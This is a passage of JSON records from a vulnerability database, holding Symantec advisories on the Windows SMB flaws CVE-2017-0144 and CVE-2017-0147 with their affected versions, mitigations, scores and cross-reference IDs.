"vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:00", "value": 8.5}}, "hash": "3557392b8f122db1c89ffcab5845347347013783ed27c31c334463bd303fac8b", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96704", "id": "SMNTC-96704", "lastseen": "2017-03-15T15:17:00", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0144 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 202}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:00"}], "viewCount": 605, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0144"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "threatpost", "idList": ["THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 9.1, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "013b6203cead14382a8f19ad32d99966"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "91624b45ebf883841bfe8f7b6a15aa38"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "766e2dcc28b9a137fc31c493662a08bd"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96709", "hash": "a6850c00b9a16b70a17246d1a9dc542daa01313c182daaace5b1b9955d704e5c", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0147 Information Disclosure Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 4.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96709", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0147"], "lastseen": "2021-06-08T19:05:23", "history": [{"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2016 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-12T06:25:12", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["CVE-2017-0147"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2018-03-12T06:25:12", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "b6f811f9f2478edc531d2bed693fb7f3cb58da672b05b11d60a7f46ca8a3a8dc", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "024611330f5a6b8c5b50ddba76c4d1e9", "key": "affectedSoftware"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "5c1cd1e39070996194f8d33a24db02ff", "key": "description"}, {"hash": "3c236091754d2db00c1c42f811b3ada4", "key": "cvss"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "f51242d5df99f0b16f54bc3140a1a24a", "key": "href"}, {"hash": "66d6cc2a78eb79d5239c273496f3915f", "key": "title"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96709", "id": "SMNTC-96709", "immutableFields": [], "lastseen": "2018-03-12T06:25:12", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0147 Information Disclosure Vulnerability", "type": "symantec", "viewCount": 67}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-12T06:25:12"}, {"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0147"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Server 2016 for x64-based Systems\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 6.5}}, "hash": "81af8b6bc95ec3b077cd48d6f229131f68e33357e7b819ae87d0a34a6319bcdf", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96709", "id": "SMNTC-96709", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0147 Information Disclosure Vulnerability", "type": "symantec", "viewCount": 36}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}], "viewCount": 72, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", 